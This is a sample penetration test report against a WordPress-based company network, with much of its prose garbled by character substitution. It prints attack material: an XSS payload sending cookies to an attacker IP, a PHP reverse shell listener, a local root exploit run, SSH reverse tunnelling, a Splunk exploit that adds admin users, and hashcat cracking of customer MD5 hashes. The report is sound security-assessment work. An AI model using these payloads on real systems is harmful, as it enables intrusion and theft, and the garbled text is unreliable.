Penetration Testing Sample Report

!
"#"$%&$'(# *"+$ ,"-(%$

Archmake.com
Second LdlLlon, 28Lh of lebruary, 2012.
.//"#+'0" 1"23%'$4 1"%0'2"+5 667
19706 Cne norman 8lvd.
SulLe 8 #233
Cornellus, nC 28031
unlLed SLaLes of Amerlca
1el: 1-402-608-1337
lax: 1-704-623-3787
Lmall: lnfo[offsec.com
Web: hLLp://www.offenslve-securlLy.com
!898*,:*;.9 *81* ,8!.,* < :,7=>:?8@7.>
18-20120228 CopyrlghL 2012 Cffenslve SecurlLy LLd. All rlghLs reserved. age l
!"#$% '( )'*+%*+,
8A"23$'0" 13BB&%4 C
!"##$%& () *+,"-., /
:$$&2D 9&%%&$'0" E
0(%12%+,, 345-(6.$.6(7 8
0(%12%+,, 2-"967 :767.+71+1 ;6-+ <&5+ :5-($1 =
>67"4 >(?$- 2%6@6-+9+ 3,?$-$.6(7 A
B$67.$67679 C??+,, .( D(#5%(#6,+1 0+E,+%@+% /F
G"-7+%$E-+ !5-"7H I7,.$--$.6(7 //
J(#$67 2%6@6-+9+ 3,?$-$.6(7 /K
J$.$E$,+ D(7.+7. 345-(6.$.6(7 /A
C..$?H+% D(7.%(- () C%?L#$H+ <%$7,$?.6(7, MM
7(#2F3+'(# GE
*+?(##+71$.6(7, M8
*6,H *$.679 MN
:--"#H'A :I J3F#"%&K'F'$4 L"$&'F &#H >'$'M&$'(# GN
*6,H *$.679 !?$-+ M=
:75%(.+?.+1 02OC1#67 C??+,, M=
G"-7+%$E-+ 0(%12%+,, !+$%?L 2-"967 M=
0+E,+%@+% PQ65 G"-7+%$E6-6.& MR
G"-7+%$E-+ !5-"7H I7,.$--$.6(7 MR
S$%1?(1+1 :,+%7$#+ $71 2$,,T(%1 67 34+?".$E-+ MR
J$.$E$,+ :7,$-.+1 2$,,T(%1 !.(%$9+ MA
:75%(.+?.+1 J$.$E$,+ !+%@+% MA
J$.$E$,+ D(7.$67, :7+7?%&5.+1 D%+16. D$%1 U"#E+%, MA
>$?H () <%$7,$?.6(7 G+%6)6?$.6(7 MV
!!S W+& ;6-+, 7(. 2$,,T(%1 2%(.+?.+1 MV
X".E("71 C??+,, )%(# 0+E,+%@+% 8F
0(%12%+,, :5-($1 2-"967 I7@$-61 ;6-+ <&5+ DL+?H, 8F
:--"#H'A OI 6'+$ (/ 7P&#M"+ B&H" $( :%2PB&D" 14+$"B+ EC
:--"#H'A 7I :K(3$ .//"#+'0" 1"23%'$4 EG

!898*,:*;.9 *81* ,8!.,* < :,7=>:?8@7.>
18-20120228 CopyrlghL 2012 Cffenslve SecurlLy LLd. All rlghLs reserved. age 1 of 32
-.%/0+12% 3044"56
Cffenslve SecurlLy has been conLracLed Lo conducL a peneLraLlon LesL agalnsL Archmake's exLernal web
presence. 1he assessmenL was conducLed ln a manner LhaL slmulaLed a mallclous acLor engaged ln a
LargeLed aLLack agalnsL Lhe company wlLh Lhe goals of:
o ldenLlfylng lf a remoLe aLLacker could peneLraLe Archmake's defenses.
o ueLermlnlng Lhe lmpacL of a securlLy breach on:
o 1he lnLegrlLy of Lhe company's order sysLems.
o 1he confldenLlallLy of Lhe company's cusLomer lnformaLlon.
o 1he lnLernal lnfrasLrucLure and avallablllLy of Archmake's lnformaLlon sysLems.
1he assessmenL was conducLed ln accordance wlLh Lhe recommendaLlons ouLllned ln nlS1 S 800-113
1
.
1he resulLs of Lhls assessmenL wlll be used by Archmake Lo drlve fuLure declslons as Lo Lhe dlrecLlon of
Lhelr lnformaLlon securlLy program. All LesLs and acLlons were conducLed under conLrolled condlLlons.
3044"56 '( 7%,0$+,
neLwork reconnalssance was conducLed agalnsL Lhe address space provlded by Archmake wlLh Lhe
undersLandlng LhaL Lhls space would be consldered Lhe scope for Lhls engagemenL. lL was deLermlned
LhaL Lhe company malnLalns a mlnlmal exLernal presence, conslsLlng of an exLernal web slLe and a
hosLed mall servlce. 1hls consLlLuLed a small aLLack surface, necesslLaLlng a focus on Lhe prlmary
webslLe.
Whlle revlewlng Lhe securlLy of Lhe prlmary Archmake webslLe, lL was dlscovered LhaL a vulnerable
Wordress plugln was lnsLalled. 1hls plugln was successfully explolLed, leadlng Lo admlnlsLraLlve access
Lo Lhe Wordress lnsLallaLlon. 1hls access was uLlllzed Lo obLaln lnLeracLlve access Lo Lhe underlylng
operaLlng sysLem, and Lhen escalaLed Lo rooL prlvlleges.
Armed wlLh admlnlsLraLlve access Lo Lhe Archmake webserver, Cffenslve SecurlLy was Lhen able Lo
ldenLlfy lnLernal neLwork resources. A vulnerablllLy ln an lnLernal sysLem was leveraged Lo galn local
sysLem access, whlch was Lhen escalaLed Lo domaln admlnlsLraLor rlghLs. 1hls placed Lhe enLlre
lnfrasLrucLure of Lhe neLwork under Lhe conLrol of Lhe aLLackers.

1
hLLp://csrc.nlsL.gov/publlcaLlons/nlsLpubs/800-113/S800-113.pdf
!898*,:*;.9 *81* ,8!.,* < :,7=>:?8@7.>
Whlle mapplng Lhe lnLernal neLwork, an appllcaLlon was dlscovered LhaL accessed an lnLernal corporaLe
daLabase. 1he appllcaLlon was compromlsed, and ln dolng so, allowed Cffenslve SecurlLy Lo galn access
Lo Lhe lnLernal daLabase where cusLomer lnformaLlon ls sLored. AddlLlonally, lL was found LhaL Lhls
daLabase sysLem manages cusLomer orders. 1hls sysLem was used Lo process reLurns on aLLacker-
conLrolled credlL cards, allowlng Cffenslve SecurlLy Lo exLracL funds dlrecLly from Lhe company.

!898*,:*;.9 *81* ,8!.,* < :,7=>:?8@7.>
8++"/9 :"55"+12%
;'5<=5%,, -.>$'1+"+1'*
Whlle conducLlng dlscovery agalnsL Lhe LargeL sysLems lL was dlscovered LhaL a Wordress 3.3.1
lnsLallaLlon was ln place. Whlle Lhls sysLem was belng revlewed for securlLy lssues, Lhe WScan
2
Lool was
used, whlch reporLed LhaL an lnsecure plugln was ln place.

As reporLed by WScan, Lhe 8elevanssl plugln suffered from a Cross-SlLe ScrlpLlng vulnerablllLy
3
,
documenLed on Lhe LxplolL uaLabase. 1he aforemenLloned vulnerablllLy was leveraged Lo conducL a
Cross-SlLe ScrlpLlng aLLack, wlLh Lhe lnLenL of sLeallng auLhenLlcaLlon cookles from an admlnlsLraLlve
user.

2
hLLp://code.google.com/p/wpscan
3
hLLp://www.explolL-db.com/explolLs/16233
./wpscan.rb --url www.Archmake.com --enumerate p
____________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_| v1.1
WordPress Security Scanner by ethicalhack3r.co.uk
Sponsored by the RandomStorm Open Source Initiative
_____________________________________________________
| URL: http://www.Archmake.com/
| Started on Tue Jan 24 18:44:49 2012
[!] The WordPress theme in use is called "twentyeleven".
[!] The WordPress "http://www.Archmake.com/readme.html" file exists.
[!] WordPress version 3.3.1 identified from meta generator.
[+] Enumerating installed plugins...
Checking for 2892 total plugins... 100% complete.
[+] We found 2 plugins:
Name: relevanssi
Location: http://www.Archmake.com/wp-content/plugins/relevanssi/
Directory listing enabled? Yes.
Name: relevanssi
Location: http://www.Archmake.com/wp-content/plugins/relevanssi/
Directory listing enabled? Yes.
[+] There were 1 vulnerabilities identified from the plugin names:
[!] Relevanssi 2.7.2 Wordpress Plugin Stored XSS Vulnerability
* Reference: http://www.exploit-db.com/exploits/16233/
[+] Finished at Tue Jan 24 18:45:30 2012
!898*,:*;.9 *81* ,8!.,* < :,7=>:?8@7.>
1o conducL Lhls aLLack, Cffenslve SecurlLy lnserLed Lhe followlng code lnLo Lhe search bar on Lhe
Archmake web slLe:

lor Lhls aLLack Lo properly execuLe, a user logged lnLo Lhe Wordress admlnlsLraLlve lnLerface was
requlred Lo access Lhe user Searches" page.

When Lhls page was accessed, Lhe cross-slLe scrlpLlng aLLack was execuLed. 1hls can be verlfled by
accesslng Lhe vlew source opLlon on Lhe user Searches" page.

AL Lhe Llme LhaL Lhe user Searches" page was accessed, a remoLe llsLener was runnlng on Lhe aLLacker's
machlne. 1hls capLured Lhe logged ln user's auLhenLlcaLlon cookle.
<script>new
Image().src="http://172.16.40.204/p.php?cookie="+document.cookie; </script>
!898*,:*;.9 *81* ,8!.,* < :,7=>:?8@7.>

1hls cookle was Lhen manually lnserLed lnLo llrefox uslng a cookle edlLor. 1hls bypassed Lhe logln
funcLlon by Lrlcklng Wordress lnLo bellevlng Lhe aLLacker had already successfully auLhenLlcaLed Lo Lhe
sysLem.

AfLer reloadlng Lhe web page, lL was verlfled LhaL admlnlsLraLlve access had successfully been obLalned.
GET
/p.php?cookie=wordpress_ed8a4e5dd813c7b5d262130b08955a6a=admin%7C1328098588
%7C72c3335ad1e783b75bb3d8cf9e85fc9c;%20wp-settings-time-
1=1327925790;%20wordpress_test_cookie=WP+Cookie+check;%20wordpress_logged_i
n_ed8a4e5dd813c7b5d262130b08955a6a=admin%7C1328098588%7Caf1bcabca49191de76e
c45e798ae5ada;%20wp-settings-
1=editor%3Dhtml;%20wordpress_ed8a4e5dd813c7b5d262130b08955a6a=admin%7C13275
99469%7C3ada64cf8e918c9a4bf148896181fc63;%20wordpress_logged_in_ed8a4e5dd81
3c7b5d262130b08955a6a=admin HTTP/1.1
!898*,:*;.9 *81* ,8!.,* < :,7=>:?8@7.>

Cnce Lhls level of admlnlsLraLlve access was obLalned, full conLrol vla Lhe Wordress admlnlsLraLlve
lnLerface was posslble. 1hls can resulL ln code execuLlon on Lhe slLe Lhrough mulLlple meLhods, mosL
dlrecLly Lhrough Lhe edlLlng of Lhe Wordress Lheme flles, whlch granL access Lo Lhe underlylng P
code. 1he lnLegrlLy of Lhe webserver was now compromlsed, wlLh mulLlple escalaLlon paLhs avallable Lo
Lhe aLLacker.
lor deLalls of Lhe explolLed vulnerablllLy, please see Appendlx A.
;'5<=5%,, =$0?1* @*1*+%*<%< A1$% !6>% @>$'"<
Cnce admlnlsLraLlve access Lo Lhe Wordress sysLem had been obLalned, an efforL was Laken Lo ldenLlfy
any addlLlonal vulnerablllLles LhaL could be leveraged by an aLLacker. As parL of Lhls efforL, a revlew of
Lhe lnsLalled pluglns was made.
Whlle conducLlng Lhls revlew, a plugln was ldenLlfled LhaL allowed for Lhe uploadlng of user supplled
proflle lmages.

upon revlewlng Lhe source code for Lhls plugln, Cffenslve SecurlLy dlscovered LhaL a regular expresslon
conLrols Lhe Lypes of flles LhaL may be uploaded Lo Lhe slLe.
!898*,:*;.9 *81* ,8!.,* < :,7=>:?8@7.>

1he above secLlon of code from Lhe upload scrlpL checks for allowed flle Lypes ln a flawed manner. 1he
regular expresslon performs a slmple sLrlng evaluaLlon, and ls Lhe only LesL used Lo deLermlne Lhe flle
Lype of Lhe ob[ecL Lhe user ls aLLempLlng Lo upload. 1he lnLenL of Lhe regex ls Lo maLch a flle name such
as Mylmage.png", wlLh Lhls hlghllghLed porLlon of Lhe name equallng Lhe regular expresslon maLch.
Powever, flles such as MyLvllllle.png.php" would successfully maLch as well, allowlng Lhe upload of an
execuLable scrlpL.
lL was declded Lo leverage Lhls vulnerably Lo upload aLLacker-supplled Lools and scrlpLs Lo Lhe LargeLed
sysLem. 1here are mulLlple ways LhaL flle Lransfers could be conducLed wlLh Lhe level of access LhaL had
been obLalned, however, lL was declded LhaL leveraglng Lhls process had Lhe dual beneflL of
demonsLraLlng an exlsLlng vulnerablllLy on Lhe slLe, as well as mlnlmlzlng Lhe changes made Lo Lhe
webserver.

1o verlfy LhaL Lhe upload process worked as lnLended, a sLandard graphlc flle was uploaded as a LesL.
Cnce Lhls was compleLed successfully, Cffenslve SecurlLy modlfled Lhe name of a P reverse shell (pre-
!898*,:*;.9 *81* ,8!.,* < :,7=>:?8@7.>
conflgured Lo connecL back Lo an Cffenslve SecurlLy conLrolled sysLem so as Lo noL lnLroduce an
addlLlonal securlLy vulnerablllLy) and uploaded lL Lo Lhe sysLem.
A llsLener was Lhen run on Lhe aLLacker-conLrolled sysLem and Lhe P reverse shell was accessed,
resulLlng ln lnLeracLlve shell access on Lhe remoLe sysLem. 8ecause Lhls shell was runnlng wlLhln Lhe
conLexL of Lhe webserver, lL only had mlnlmal sysLem permlsslons.

lor deLalls of Lhe explolLed vulnerablllLy, please see Appendlx A
B1*0. B'/"$ =5121$%?% -,/"$"+1'*
WlLh lnLeracLlve access Lo Lhe LargeLed webserver obLalned, Lhe nexL ob[ecLlve was Lo galn
admlnlsLraLlve access Lo Lhe sysLem.
1he operaLlng sysLem of Lhe webserver was deLermlned Lo be Linux version 2.6.32-5-686
(Debian 2.6.32-38) (ben@decadent.org.uk) (gcc version 4.3.5 (Debian 4.3.5-4)
) #1 SMP Mon Oct 3 04:15:24 UTC 2011". AfLer researchlng poLenLlal aLLack vecLors, lL was
dlscovered LhaL Lhe sysLem was vulnerable Lo a race condlLlon ln bzlp2. A publlcly avallable explolL
4
for
Lhls vulnerablllLy was found on Lhe LxplolL uaLabase.
1o escalaLe prlvlleges, Lhe explolL was uploaded Lo Lhe sysLem vla Lhe lnsecure upload proflle plcLure
plugln.

4
root@bt:~# nc -lvp 53
listening on [any] 53 ...
connect to [172.16.40.204] from www.Archmake.com [172.16.40.1] 34850
Linux archwww 2.6.32-5-686 #1 SMP Mon Oct 3 04:15:24 UTC 2011 i686
GNU/Linux
10:49:14 up 12 days, 23:47, 2 users, load average: 0.00, 0.00, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
rdole tty7 :0 16Jan12 12days 5:51 0.24s x-session-
manag
rdole pts/2 :0.0 Tue10 6:01m 0.38s 44.68s gnome-
terminal
uid=33(www-data) gid=33(www-data) groups=33(www-data)
!898*,:*;.9 *81* ,8!.,* < :,7=>:?8@7.>

lL was Lhen a sLralghLforward process of decompresslng Lhe execuLable, provldlng execuLe permlsslons,
and runnlng Lhe explolL. 1hls resulLed ln rooL level access, allowlng full conLrol of Lhe enLlre webserver.

AL Lhls polnL, Lhe webserver represenLs an lnLernal aLLack plaLform for a mallclous parLy. WlLh full
admlnlsLraLlve access now avallable, a mallclous parLy could uLlllze Lhe sysLem for a mulLlLude of
purposes, ranglng from aLLacks agalnsL Archmake lLself, Lo aLLacks agalnsL lLs cusLomers. lf Lhls had been
a Lrue compromlse, Archmake admlnlsLraLors would noL be able Lo LrusL any daLa on Lhe webserver.
$ cd /var/www/wp-content/uploads/2012/02
$ ls race.png.gz
race.png.gz
$ gunzip race.png.gz
$ chmod +x race.png
$ ./race.png
usage: ./race.png <cmd name>
$ ./race.png dd
id
uid=0(root) gid=33(www-data) groups=0(root),33(www-data)
!898*,:*;.9 *81* ,8!.,* < :,7=>:?8@7.>
C"1*+"1*1*? 8//%,, +' )'4>5'41,%< ;%#,%52%5
Cnce admlnlsLraLlve access Lo Lhe webserver had been esLabllshed, furLher aLLacks agalnsL Archmake
requlred a more sLable connecLlon Lhan whaL was provlded by Lhe P backdoor.
upon examlnlng Lhe explolLed webserver, lL was dlscovered LhaL an SSP servlce was runnlng on porL
22000. lL was declded LhaL uslng Lhls servlce was a beLLer soluLlon for esLabllshlng a sLandard meLhod of
lnLeracLlon wlLhouL lnLroduclng addlLlonal securlLy vulnerablllLles Lo Lhe sysLem.
ln order Lo mlnlmlze changes Lo Lhe sysLem, SSP key-based auLhenLlcaLlon was used for auLhenLlcaLlon
raLher Lhan alLerlng or addlng any user accounLs. 1hese keys work as a meLhod of auLhenLlcaLlon
Lhrough Lhe use of publlc key crypLography, conslsLlng of a publlc/prlvaLe key palr. 1o enable Lhls access,
Lhe aLLacker's publlc key was added Lo Lhe auLhorlzed_keys flle for Lhe rooL user. AddlLlonally, Lhe publlc
key of Lhe web server was copled Lo Lhe auLhorlzed_keys flle of Lhe aLLacklng sysLem.
WlLh Lhe aforemenLloned auLhenLlcaLlon sysLem ln place, a SSP server was sLarLed on Lhe aLLacker's
sysLem on 1C porL 33. We were confldenL LhaL Lhe webserver would be able Lo make ouLbound
connecLlons Lo Lhe remoLe sysLem uslng LhaL porL based upon Lhe lnlLlal explolL. lrom Lhe P shell
envlronmenL, Lhe command

was execuLed and lnlLlaLed a connecLlon from Lhe vlcLlm's sysLem Lo Lhe aLLacker. AddlLlonally, Lhls
creaLed a llsLener on Lhe aLLacker's sysLem LhaL would Lunnel local connecLlons Lo Lhe llsLenlng SSP
server on Lhe vlcLlm's sysLem.

ssh -o 'StrictHostKeyChecking no' -R 22000:127.0.0.1:22000
-p 53 172.16.40.204 ping 127.0.0.1
!898*,:*;.9 *81* ,8!.,* < :,7=>:?8@7.>
1hls Lunnel was Lhen uLlllzed Lo open a sLandard SSP connecLlon as Lhe rooL user Lo Lhe vlcLlm web
server. AddlLlonally, a SCCkS proxy was creaLed beLween Lhe Lwo sysLems, allowlng appllcaLlons on Lhe
aLLacker's sysLem Lo access Lhe vlcLlm's neLwork Lhrough Lhe proxy. 1hls has Lhe effecL of maklng all
connecLlons appear as lf Lhey are comlng from Lhe vlcLlm's sysLem. 1hls conflguraLlon allowed Lhe
aLLacker Lo masquerade as Lhe vlcLlm's sysLem.

lor Lhe purposes of Lhe peneLraLlon LesL, Lhls connecLlon was creaLed manually. ln Lhe lnsLance of a Lrue
aLLack, lL ls llkely LhaL Lhe aLLacker would lmplemenL an auLomaLed process Lo re-creaLe Lhe Lunnels lf
Lhe connecLlon was broken for any reason.
1hls phase of Lhe aLLack dld noL explolL any vulnerablllLles or Lake advanLage of any newly dlscovered
mlsconflguraLlons on Lhe sysLem. lL was slmply Lhe resulL of Lhe level of access LhaL had been obLalned
on Lhe sysLem due Lo Lhe success of Lhe prevlous aLLacks. 1hls phase ls where Lhe aLLacker consolldaLed
Lhe necessary access and conLrol, Lo furLher peneLraLe Archmake's neLwork. Clearly undersLandlng Lhls
aspecL, ls essenLlal ln undersLandlng Lhe scope of Lhe peneLraLlon.
D0$*%5"#$% 3>$0*9 E*,+"$$"+1'*
Whlle lnspecLlng Lhe conflguraLlon of Lhe compromlsed webserver, references were dlscovered Lo a
10.10.0.x neLwork LhaL appeared Lo be dlrecLly accesslble by Lhe compromlsed sysLem. neLwork
reconnalssance sLeps, used Lo dlscover addlLlonal asseLs locaLed on Lhls secondary neLwork, revealed a
Splunk server.
verslons of Splunk prlor Lo 4.2.3 suffer from a remoLe vulnerablllLy LhaL can be explolLed wlLh a publlcly
avallable explolL
3
locaLed on Lhe LxplolL uaLabase. uslng Lhe SCCkS proxy LhaL was prevlously
esLabllshed, Cffenslve SecurlLy accessed Lhe web lnLerface of Lhe Splunk lnsLallaLlon, and ldenLlfled LhaL
Lhe lnsLalled verslon was 4.2.2, and Lhus, vulnerable Lo aLLack.

3
!898*,:*;.9 *81* ,8!.,* < :,7=>:?8@7.>

1o conducL Lhe aLLack, Lhe publlc explolL was Lransferred Lo Lhe compromlsed webserver, and Lhen run
agalnsL Lhe LargeLed sysLem. 1hls aLLack ls conducLed ln a bllnd manner, resulLlng ln no response back
from Lhe execuLed commands. 8ecause Lhe remoLe sysLem was Wlndows-based, lL was declded LhaL an
aLLempL would be made Lo creaLe a user accounL on Lhe remoLe sysLem. As Splunk ls ofLen lnsLalled wlLh
local S?S1LM prlvlleges, Lhls user would Lhen be added Lo Lhe AdmlnlsLraLors group.
!898*,:*;.9 *81* ,8!.,* < :,7=>:?8@7.>

1he success of Lhe aLLack was LesLed by aLLempLlng Lo use Lhe newly creaLed accounL Lo esLabllsh an
lnLeracLlve sesslon on Lhe LargeLed sysLem vla Wlndows 8emoLe ueskLop.
root@archwww:~/exploit# python splunk_exploit.py -h
Usage: Run splunk_exploit.py -h to see usage options
Options:
--version show program's version number and exit
-h, --help show this help message and exit
-t TARGETHOST IP Address or hostname of target splunk server
-c Generate CSRF URL only
-f Target is configured to use a Free licence and does
not
permit remote auth
-w SPLUNKWEB_PORT The Splunk admin interface port (Default: 8000)
-d SPLUNKD_PORT The Splunkd Web API port (Default: 8089)
-u USERFILE File containing usernames for use in dictionary attack
-p PASSFILE File containing passwords for use in dictionary attack
-U USERNAME Admin username (if known)
-P PASSWORD Admin pasword (if known)
-e USERPAIR Attempt to add admin user via priv up directory
traversal
magic. Accepts username:password
root@archwww:~/exploit# python splunk_exploit.py -t 10.10.0.3 -f
[i] Splunkd server found. Version:4.2.2
[i] OS:Windows 0 6
[i] Splunk web interface discovered
[i] CVAL:1480339707
[i] Configured with free licence. No auth required
[Payload Options]
[1] Pseudo Interactive Shell
[2] Perl Reverse Shell
[3] Command Exec (Blind)
Please select option 1-3:3
blind_shell>net user hacker t00rt00rt00r! /add
[i] Executing Command:net user hacker t00rt00rt00r! /add
net user hacker t00rt00rt00r! /add
blind_shell>net localgroup administrators hacker /add
[i] Executing Command:net localgroup administrators hacker /add
net localgroup administrators hacker /add
!898*,:*;.9 *81* ,8!.,* < :,7=>:?8@7.>

WlLh Lhls connecLlon esLabllshed, we verlfled LhaL Lhe creaLed accounL had local admlnlsLraLlve access.
AL Lhls polnL, Cffenslve SecurlLy had a level of access equal Lo slLLlng aL Lhe physlcal sysLem console of
Lhe newly compromlsed hosL.
F'4"1* =5121$%?% -,/"$"+1'*
1o deLermlne Lhe full poLenLlal of Lhls compromlse, an aLLempL was made Lo escalaLe prlvlleges from
local admlnlsLraLor Lo domaln admlnlsLraLor. uLlllzlng Lhe compromlsed Splunk server, Cffenslve
SecurlLy Lransferred Wlndows CredenLlal LdlLor (WCL)
6
Lo Lhe remoLe sysLem Lhrough Lhe use of Lhe

6
hLLp://www.ampllasecurlLy.com/research/wcefaq.hLml
!898*,:*;.9 *81* ,8!.,* < :,7=>:?8@7.>
compromlsed webserver. WCL ls a Lool LhaL allows aLLackers Lo make use of Wlndows credenLlals from
memory and repurpose Lhem for alLernaLe use.
upon lnlLlal Lransfer of Lhe WCL LoolklL Lo Lhe sysLem, lL was dlscovered LhaL Lhe uomaln AdmlnlsLraLor
Loken was presenL wlLhln memory.

WlLh Lhls credenLlal ln memory, lL was a slmple maLLer of uslng Lhls Loken Lo execuLe a new command
shell LhaL would operaLe wlLh uomaln AdmlnlsLraLor rlghLs.
!898*,:*;.9 *81* ,8!.,* < :,7=>:?8@7.>

1hls shell was Lhen used Lo run Lhe MlcrosofL ManagemenL Console (MMC) as Lhe uomaln
AdmlnlsLraLor. WlLh Lhe MMC loaded, Lhe AcLlve ulrecLory users and CompuLers snap-ln was loaded,
glvlng Lhe aLLacker Lhe ablllLy Lo edlL domaln enLlLles. 1hls was uLlllzed Lo creaLe a new neLwork user,
whlch was subsequenLly added Lo Lhe uomaln AdmlnlsLraLor's group.
!898*,:*;.9 *81* ,8!.,* < :,7=>:?8@7.>

1hls new user was capable of accesslng Lhe enLlre Archmake AcLlve ulrecLory domaln, wlLh full rlghLs
and prlvlleges. AL Lhls polnL, Lhe lnLegrlLy of Lhe enLlre Wlndows neLwork ls compromlsed. ln Lerms of
nexL sLeps, a Lrue aLLacker would have mulLlple Lools aL Lhelr dlsposal, lncludlng:
o uLlllzaLlon of Croup ollcy Lo deploy backdoor sofLware on all sysLems.
o CompleLe exfllLraLlon of all daLa sLored on any sysLem LhaL uses Wlndows auLhenLlcaLlon.
o uesLrucLlon of any and all neLwork resources.
o 1argeLed aLLacks agalnsL any and all employees of Archmake, Lhrough Lhe use of lnformaLlon
gaLherlng Lools such as keysLroke loggers Lo ldenLlfy personal lnformaLlon.
o Leveraglng Lhls sysLemlc access Lo conducL aLLacks agalnsL Archmake suppllers and parLners LhaL
malnLaln a LrusL relaLlonshlp wlLh Lhe company.
lL was deLermlned LhaL whlle Lhese sLeps would be posslble, Lhey would be consldered ouLslde Lhe scope
of Lhe currenL engagemenL. lL was demonsLraLed LhaL a LoLal compromlse of Lhe Archmake domaln had
been accompllshed wlLh a compleLe loss of lnLegrlLy for all local sysLems.
!898*,:*;.9 *81* ,8!.,* < :,7=>:?8@7.>
F"+"#",% )'*+%*+ -.>$'1+"+1'*
AfLer Lhe Splunk server was explolLed, an examlnaLlon of lLs local flle sysLems revealed a dlrecLory
conLalnlng an execuLable and a CSv flle.

upon lnvesLlgaLlng Lhe CSv flle, lL was found Lo conLaln Archmake's cusLomer lnformaLlon LhaL had been
exLracLed from a daLabase server.

!898*,:*;.9 *81* ,8!.,* < :,7=>:?8@7.>
lL was deLermlned LhaL Lhls flle was generaLed by Lhe exporLcsv.exe program. 1hls program was
examlned Lo obLaln an undersLandlng of lLs lnner worklngs, and Lo deLermlne lf lL conLalned any
lnformaLlon LhaL would faclllLaLe access Lo Lhe daLabase server.
Whlle vlewlng Lhe program wlLhln a debugger, lL was dlscovered LhaL lL creaLed a dlrecL connecLlon Lo a
MlcrosofL SCL server. 1he credenLlals for Lhls connecLlon were hard coded wlLhln Lhe appllcaLlon.

8y maklng use of Lhese credenLlals, lL was posslble Lo make a dlrecL connecLlon Lo Lhe backend daLabase
server Lo dlrecLly access Lhe daLa.

1hls access allowed us Lo dlrecLly manlpulaLe all daLa wlLhln Lhe daLabase.
!898*,:*;.9 *81* ,8!.,* < :,7=>:?8@7.>

uLlllzlng Lhls connecLlon, an exporL of Lhe daLabase was performed. 1hls resulLed ln a slgnlflcanL
compromlse of cusLomer daLa. llelds LhaL were exLracLed lncluded: userlu, llrsL and LasL name, L-mall
address, Lelephone number, encrypLed password, malllng address, and varlous blLs of user lnformaLlon.

AfLer examlnlng Lhe ouLpuL, lL was deLermlned LhaL Lhe password fleld was composed of Mu3 hashes.
1hese hashes were loaded lnLo an Cffenslve SecurlLy operaLed password cracker. CuL of Lhe 1000
loaded hashes, 996 were recovered Lo clear LexL ln LwenLy Lwo seconds of operaLlon.
!898*,:*;.9 *81* ,8!.,* < :,7=>:?8@7.>

1he effecL of Lhls amounLs Lo a serlous compromlse. 1he volume of personal lnformaLlon exLracLed from
Lhe daLabase, comblned wlLh Lhe common Lendency for password re-use, could slgnlflcanLly lmpacL Lhe
cusLomers of Archmake had Lhls been a real aLLack.
Hashes: 1002
Unique digests: 1000
Bitmaps: 13 bits, 8192 entries, 0x00001fff mask, 32768 bytes
Rules: 1
GPU-Loops: 128
GPU-Accel: 40
Password lengths range: 1 - 15
Platform: AMD compatible platform found
Watchdog: Temperature limit set to 90c
Device #1: Cayman, 2048MB, 0Mhz, 22MCU
Device #2: Cayman, 2048MB, 0Mhz, 22MCU
Device #1: Allocating 132MB host-memory
Device #1: Kernel ./kernels/4098/m0000_a0.Cayman.64.kernel (1132724 bytes)
Device #2: Allocating 132MB host-memory
Device #2: Kernel ./kernels/4098/m0000_a0.Cayman.64.kernel (1132724 bytes)

Scanned dictionary /pentest/passwords/wordlists/hatelist.txt: 2712389526
bytes, 232438151 words, 232438151 keyspace, starting attack...

9d72aa552f6628526ab1e193d4aa0f2b:abode
7e84b7b8d1c678647abafd23449a1db1:acqua
79e3d51a81199a960a370f6e4f0ba40c:abnormal
616efb73c7fc429cd5189f7f95d72746:adige
8d8bfbd10b5f6d48eb9691bb4871de62:admit
3b7770f7743e8f01f0fd807f304a21d0:adjust
c9fe0bd5322a98e0e46ea09d2c319cd2:aflame
bda059e1d21467e68b86d5b33ff78fc1:absentminded
e43fd1f89dbc258fe651ac8ecaa7a61a:admonition
...
Status.......: Exhausted
Input.Mode...: File (/pentest/passwords/wordlists/hatelist.txt)
Hash.Type....: MD5
Time.Running.: 22 secs
Time.Left....: 0 secs
Time.Util....: 22084.0ms/17923.2ms Real/CPU, 430.8% idle
Speed........: 10060.4k c/s Real, 67185.3k c/s GPU
Recovered....: 996/1000 Digests, 0/1 Salts
Progress.....: 232438151/232438151 (100.00%)
Rejected.....: 10264581/232438151 (4.42%)
HW.Monitor.#1: 0% GPU, 51c Temp
HW.Monitor.#2: 0% GPU, 44c Temp

Started: Tue Jan 31 13:43:05 2012
Stopped: Tue Jan 31 13:43:37 2012
!898*,:*;.9 *81* ,8!.,* < :,7=>:?8@7.>
8++"/9%5 )'*+5'$ '( 85/G4"9% !5"*,"/+1'*,
Whlle conducLlng furLher examlnaLlon of Lhe daLabase backend, we deLermlned LhaL a number of Lables
were belng updaLed on a regular basls. 8y monlLorlng Lhe acLlvlLy of Lhese Lables, lL was dlscovered LhaL
as orders were enLered lnLo Lhe sysLem, Lhey would be placed lnLo Lhe Lables. Cn a perlodlc basls,
anoLher process would Lake acLlon based upon Lhe CaLegory".

1hrough a comblnaLlon of monlLorlng daLabase acLlvlLy, and placlng orders Lhrough Lhe sLandard
sysLem, lL was posslble Lo ldenLlfy Lhe purpose of a subseL of CaLegorles.

Cnce a mapplng of LransacLlon Lypes was creaLed, an aLLempL was made Lo manually ln[ecL daLa lnLo Lhls
Lable. lL was dlscovered LhaL by ln[ecLlng a valld CusLlu and an aLLacker owned credlL card number wlLh a
caLegory of 4 (8efund), an arblLrary amounL of money could be refunded Lo Lhe aLLackers. 1hls was
verlfled ln cooperaLlon wlLh Archmake under conLrolled condlLlons.
lL ls belleved, buL noL LesLed, LhaL new orders could be placed and shlpped Lo aLLacker creaLed cusLomer
enLlLles. 1hls was noL verlfled due Lo Lhe dlsrupLlon lL would cause Lo Lhe Archmake workflow.
8y exerLlng conLrol over Lhe backend daLabase sysLem, lL was posslble Lo have conLrol over Lhe enLlreLy
of Lhe Archmake order process. 1hls ls of exLreme lmporLance Lo Archmake, due Lo Lhe amounL of
dlsrupLlon lL could cause Lo lLs buslness processes. AddlLlonally, Lhe ablllLy of an aLLacker Lo obLaln dlrecL
flnanclal beneflL from Lhls aLLack makes Archmake an exLremely aLLracLlve LargeL.
1 Standard order, Card charged
2 Unknown
3 Rush order, Card charged
4 Refund, Card refunded funds
5 Unknown
6 Internal order
!898*,:*;.9 *81* ,8!.,* < :,7=>:?8@7.>
)'*/$0,1'*
